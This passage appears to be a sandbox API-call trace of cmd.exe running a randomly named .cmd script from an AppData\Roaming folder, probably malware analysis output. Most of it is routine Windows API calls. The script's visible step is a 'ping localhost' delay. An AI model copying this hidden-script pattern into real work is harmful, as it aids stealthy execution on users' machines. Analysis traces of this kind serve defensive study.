hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x4, lpData=0x18ee08*=0x9, lpcbData=0x18ee00*=0x4) returned 0x0 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x0, lpData=0x18ee08*=0x9, lpcbData=0x18ee00*=0x1000) returned 0x2 [0094.064] RegCloseKey (hKey=0x40) returned 0x0 [0094.064] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886349 [0094.064] srand (_Seed=0x5b886349) [0094.064] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd\"" [0094.064] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd\"" [0094.065] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.065] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1d1858, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0094.065] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0094.065] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.065] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0094.065] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0094.065] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0094.065] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0094.065] 
_wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0094.065] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0094.065] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0094.065] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0094.065] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0094.065] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0094.065] GetEnvironmentStringsW () returned 0x1d2248* [0094.065] FreeEnvironmentStringsW (penv=0x1d2248) returned 1 [0094.065] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.065] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0094.065] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0094.065] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0094.066] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0094.066] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0094.066] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0094.066] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0094.066] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0094.066] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0094.066] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18fbc8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.066] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18fbc8, lpFilePart=0x18fbc4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18fbc4*="Desktop") returned 0x18 [0094.066] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0094.066] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f944 | out: 
lpFindFileData=0x18f944) returned 0x1cff88 [0094.066] FindClose (in: hFindFile=0x1cff88 | out: hFindFile=0x1cff88) returned 1 [0094.066] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f944 | out: lpFindFileData=0x18f944) returned 0x1cff88 [0094.066] FindClose (in: hFindFile=0x1cff88 | out: hFindFile=0x1cff88) returned 1 [0094.066] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f944 | out: lpFindFileData=0x18f944) returned 0x1cff88 [0094.066] FindClose (in: hFindFile=0x1cff88 | out: hFindFile=0x1cff88) returned 1 [0094.066] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0094.066] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0094.066] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0094.067] GetEnvironmentStringsW () returned 0x1d2a68* [0094.067] FreeEnvironmentStringsW (penv=0x1d2a68) returned 1 [0094.067] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.068] GetConsoleOutputCP () returned 0x1b5 [0094.171] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0094.171] GetUserDefaultLCID () returned 0x409 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a114950, cchData=8 | out: lpLCData=":") returned 2 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fd08, cchData=128 | out: lpLCData="0") returned 2 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fd08, cchData=128 | out: lpLCData="0") returned 2 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fd08, cchData=128 | out: lpLCData="1") returned 2 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a114940, cchData=8 | out: lpLCData="/") returned 2 
[0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a114d80, cchData=32 | out: lpLCData="Mon") returned 4 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a114d40, cchData=32 | out: lpLCData="Tue") returned 4 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a114d00, cchData=32 | out: lpLCData="Wed") returned 4 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a114cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a114c80, cchData=32 | out: lpLCData="Fri") returned 4 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a114c40, cchData=32 | out: lpLCData="Sat") returned 4 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a114c00, cchData=32 | out: lpLCData="Sun") returned 4 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a114930, cchData=8 | out: lpLCData=".") returned 2 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a114920, cchData=8 | out: lpLCData=",") returned 2 [0094.172] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0094.172] GetConsoleTitleW (in: lpConsoleTitle=0x1c0880, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.172] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0094.172] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0094.173] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0094.173] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0094.176] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd", _String2=")") returned 58 [0094.176] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd") returned 3 [0094.176] _wcsicmp (_String1="FOR/?", 
_String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd") returned 3 [0094.176] _wcsicmp (_String1="IF", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd") returned 6 [0094.176] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd") returned 6 [0094.176] _wcsicmp (_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd") returned 15 [0094.176] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd") returned 15 [0094.176] GetConsoleTitleW (in: lpConsoleTitle=0x18fa00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.176] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.176] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.177] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f7bc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f7b4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f7b4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0094.177] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0094.177] SetErrorMode (uMode=0x0) returned 0x0 [0094.177] SetErrorMode (uMode=0x1) returned 0x0 [0094.177] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x1d1a70, lpFilePart=0x18f520 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x18f520*="vMfCCeRYkvQy") returned 0x2d [0094.177] SetErrorMode (uMode=0x0) returned 0x1 [0094.177] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0094.178] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, 
nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.181] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.181] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd", fInfoLevelId=0x1, lpFindFileData=0x18f2bc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f2bc) returned 0x1c0f10 [0094.181] FindClose (in: hFindFile=0x1c0f10 | out: hFindFile=0x1c0f10) returned 1 [0094.181] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0094.181] GetConsoleTitleW (in: lpConsoleTitle=0x18f794, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.182] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0094.184] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0094.184] IdentifyCodeAuthzLevelW () returned 0x1 [0094.190] GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0094.190] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0094.190] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0094.190] CloseCodeAuthzLevel () returned 0x1 [0094.190] SetErrorMode (uMode=0x0) returned 0x0 [0094.190] SetErrorMode (uMode=0x1) returned 0x0 [0094.190] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd", nBufferLength=0x104, lpBuffer=0x1c0b88, lpFilePart=0x18f680 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd", lpFilePart=0x18f680*="RiKWxOaL.cmd") returned 0x3a [0094.190] SetErrorMode (uMode=0x0) returned 0x1 [0094.190] CmdBatNotification () returned 0x0 [0094.191] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\rikwxoal.cmd"), dwDesiredAccess=0x80000000, 
dwShareMode=0x3, lpSecurityAttributes=0x18f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0094.191] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0094.191] _get_osfhandle (_FileHandle=3) returned 0x58 [0094.191] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.191] _get_osfhandle (_FileHandle=3) returned 0x58 [0094.191] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.191] ReadFile (in: hFile=0x58, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x18f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x18f6a8*=0x7b, lpOverlapped=0x0) returned 1 [0094.192] SetFilePointer (in: hFile=0x58, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0094.192] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=21, lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 localhost\r\n") returned 21 [0094.192] _get_osfhandle (_FileHandle=3) returned 0x58 [0094.192] GetFileType (hFile=0x58) returned 0x1 [0094.192] _get_osfhandle (_FileHandle=3) returned 0x58 [0094.192] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0094.193] _wcsicmp (_String1="ping", _String2=")") returned 71 [0094.193] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0094.193] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0094.193] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0094.193] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0094.193] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0094.193] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0094.194] 
_tell (_FileHandle=3) returned 21 [0094.194] _close (_FileHandle=3) returned 0 [0094.194] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x18f47c | out: _Buffer="\r\n") returned 2 [0094.194] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.194] GetFileType (hFile=0x7) returned 0x2 [0094.194] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0094.194] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f43c | out: lpMode=0x18f43c) returned 1 [0094.194] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.194] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f468, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x18f468*=0x2) returned 1 [0094.195] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0094.195] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.195] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x18f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0094.195] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x18f478 | out: _Buffer=">") returned 1 [0094.195] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.195] GetFileType (hFile=0x7) returned 0x2 [0094.195] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0094.195] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f440 | out: lpMode=0x18f440) returned 1 [0094.195] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.195] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x18f46c, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x18f46c*=0x19) returned 1 [0094.195] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.195] GetFileType (hFile=0x7) returned 0x2 [0094.195] GetStdHandle 
(nStdHandle=0xfffffff5) returned 0x7 [0094.196] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f6c4 | out: lpMode=0x18f6c4) returned 1 [0094.196] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.196] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1d3270*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x18f6f0, lpReserved=0x0 | out: lpBuffer=0x1d3270*, lpNumberOfCharsWritten=0x18f6f0*=0x4) returned 1 [0094.196] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x18f6fc | out: _Buffer=" -n 3 localhost ") returned 16 [0094.196] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.196] GetFileType (hFile=0x7) returned 0x2 [0094.196] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0094.196] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f6bc | out: lpMode=0x18f6bc) returned 1 [0094.196] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.196] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x18f6e8, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x18f6e8*=0x10) returned 1 [0094.196] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x18f71c | out: _Buffer="\r\n") returned 2 [0094.196] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.196] GetFileType (hFile=0x7) returned 0x2 [0094.196] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0094.196] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f6dc | out: lpMode=0x18f6dc) returned 1 [0094.197] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.197] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f708, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x18f708*=0x2) returned 1 [0094.197] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0094.197] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0094.197] _wcsicmp (_String1="ping", _String2="DEL") returned 12 
[0094.197] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0094.197] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0094.197] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0094.197] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0094.197] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0094.197] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0094.197] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0094.197] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0094.197] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0094.197] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0094.197] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0094.197] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0094.197] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0094.197] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0094.197] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0094.197] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0094.197] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0094.197] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0094.197] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0094.197] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0094.197] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0094.197] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0094.197] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0094.197] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0094.197] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0094.197] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0094.197] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0094.197] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0094.197] _wcsicmp (_String1="ping", _String2="START") returned -3 [0094.197] _wcsicmp (_String1="ping", 
_String2="DPATH") returned 12 [0094.197] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0094.197] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0094.197] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0094.197] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0094.197] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0094.198] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0094.198] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0094.198] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0094.198] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0094.198] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0094.198] SetErrorMode (uMode=0x0) returned 0x0 [0094.198] SetErrorMode (uMode=0x1) returned 0x0 [0094.198] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1d0b18, lpFilePart=0x18f4c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f4c0*="Desktop") returned 0x18 [0094.198] SetErrorMode (uMode=0x0) returned 0x1 [0094.198] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0094.198] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0094.199] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.199] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.199] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x18f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f23c) returned 0xffffffff [0094.199] GetLastError () returned 0x2 [0094.199] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, 
lpFindFileData=0x18f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f23c) returned 0xffffffff [0094.199] GetLastError () returned 0x2 [0094.199] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.199] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x18f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f23c) returned 0x1d0e00 [0094.199] FindClose (in: hFindFile=0x1d0e00 | out: hFindFile=0x1d0e00) returned 1 [0094.199] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x18f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f23c) returned 0xffffffff [0094.199] GetLastError () returned 0x2 [0094.199] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x18f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f23c) returned 0x1d0e00 [0094.200] FindClose (in: hFindFile=0x1d0e00 | out: hFindFile=0x1d0e00) returned 1 [0094.200] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0094.200] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0094.200] GetConsoleTitleW (in: lpConsoleTitle=0x18f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.200] SetErrorMode (uMode=0x0) returned 0x0 [0094.200] SetErrorMode (uMode=0x1) returned 0x0 [0094.200] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1dfae8, lpFilePart=0x18edac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18edac*="Desktop") returned 0x18 [0094.200] SetErrorMode (uMode=0x0) returned 0x1 [0094.200] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0094.200] 
NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0094.200] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.200] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.200] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x18eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb28) returned 0xffffffff [0094.200] GetLastError () returned 0x2 [0094.201] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x18eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb28) returned 0xffffffff [0094.201] GetLastError () returned 0x2 [0094.201] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.201] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x18eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb28) returned 0x1dfdd0 [0094.201] FindClose (in: hFindFile=0x1dfdd0 | out: hFindFile=0x1dfdd0) returned 1 [0094.201] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x18eb28, fSearchOp=0x0, 